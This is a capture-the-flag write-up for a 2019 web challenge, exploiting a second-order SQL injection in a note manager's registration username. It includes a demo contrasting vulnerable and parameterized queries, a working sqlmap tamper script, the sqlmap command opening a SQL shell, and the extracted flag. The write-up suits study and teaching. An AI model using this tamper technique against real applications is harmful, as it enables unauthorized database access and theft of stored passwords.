Description
The ShadowLeague kindly provides you with a note manager. Not bad, huh?
http://quals.shadow-league.org:8001
**No brute force is allowed on this challenge**
Resolution
There was a second-order SQL injection in the username: the value is stored safely at registration, then reused unsafely when the user's notes are retrieved.
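To make the bug class concrete, here is an added example (not the challenge's code; the sqlite3 schema, table and column names are assumptions) showing the second-order pattern beside its fix: a parameterized INSERT stores the username verbatim, and a later query either concatenates the stored value (vulnerable) or binds it (fixed).

```python
import sqlite3

# Constructed in-memory stand-in for the challenge's note store; table and
# column names are assumptions, not the real application's schema.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        CREATE TABLE note (id INTEGER PRIMARY KEY, username TEXT, body TEXT);
        INSERT INTO user (username, password) VALUES ('admin', 'placeholder-secret');
        INSERT INTO note (username, body) VALUES ('admin', 'admin private note');
    """)
    return db

def register(db, username, password):
    # First-order write is parameterized: the payload is stored verbatim and is
    # harmless at this point, which is why nothing shows up on register.php itself.
    db.execute("INSERT INTO user (username, password) VALUES (?, ?)", (username, password))
    db.commit()

def stored_username(db, username):
    # Look the account up safely and hand back the value exactly as it sits in the table.
    row = db.execute("SELECT username FROM user WHERE username = ?", (username,)).fetchone()
    return row[0] if row else None

def notes_vulnerable(db, username):
    # Second order: a value read back from the database is treated as trusted and
    # concatenated into the next query, so whatever was registered now executes.
    stored = stored_username(db, username)
    query = "SELECT body FROM note WHERE username = '%s'" % stored
    return [r[0] for r in db.execute(query)]

def notes_fixed(db, username):
    # Same flow, but every query binds its inputs, stored values included.
    stored = stored_username(db, username)
    return [r[0] for r in db.execute("SELECT body FROM note WHERE username = ?", (stored,))]

def demo():
    db = make_db()
    attacker = "admin' --"  # constructed test value: the comment ends the quoted literal early
    register(db, attacker, "pw")
    return notes_vulnerable(db, attacker), notes_fixed(db, attacker)

if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable:", leaked)  # ['admin private note']
    print("fixed:", safe)         # []
```

The vulnerable path returns another account's notes for a username that only exists as a string in the `user` table; the fixed path returns nothing, because the bound value never reaches the SQL parser.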
“There are two types of SQL injection: those I do with SQLMAP and those I would not do.”
me – circa 2019
We needed a tamper script to let SQLMAP do its magic. We had already seen almost exactly the same injection in the HTB VM "Nightmare", and this write-up sums it up.
```python
#!/usr/bin/env python
import requests


def create_account(payload):
    # Register an account whose username is the current SQLMAP payload, so that
    # the payload is already stored when the login request triggers the
    # second-order query. Only the side effect matters; the response is unused.
    s = requests.Session()
    proxies = {'socks': 'http://127.0.0.1:9052'}
    params = (
        ('username', payload),
        ('password', '0x90r00t'),
    )
    headers = {
        'Host': 'quals.shadow-league.org:8001',
        'Upgrade-Insecure-Requests': '1',
        'DNT': '1',
        'User-Agent': 'I m a teapot',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
        'Referer': 'http://quals.shadow-league.org:8001/home.php',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'tr-TR',
        'Connection': 'close',
    }
    print("Creating ", payload)
    response = s.get('http://quals.shadow-league.org:8001/register.php',
                     headers=headers, params=params, verify=False, proxies=proxies)


def tamper(payload, **kwargs):
    # SQLMAP tamper entry point: register the payload first, then hand the
    # payload back unchanged for the actual request.
    headers = kwargs.get("headers", {})
    headers["Cookie"] = create_account(payload)
    return payload
```
Once the tamper script was ready, we launched SQLMAP:

```
me@sec: proxychains sqlmap -u "http://quals.shadow-league.org:8001/index.php?username=nopnopnop&password=0x90r00t" --tamper tampere.py --tables -p username --risk 3 --level 5 --sql-shell --fresh-queries
```

Then we waited for the sql-shell to appear.

One SELECT query and the flag was ours:

```
select password from user limit 1: 'SCE{sQl_fl4g3d_f0r_th3_w1n!}'
```

The flag was SCE{sQl_fl4g3d_f0r_th3_w1n!}
[Sogeti Cyber E-scape 2019] [WEB 500 – Notebad.exe] Write Up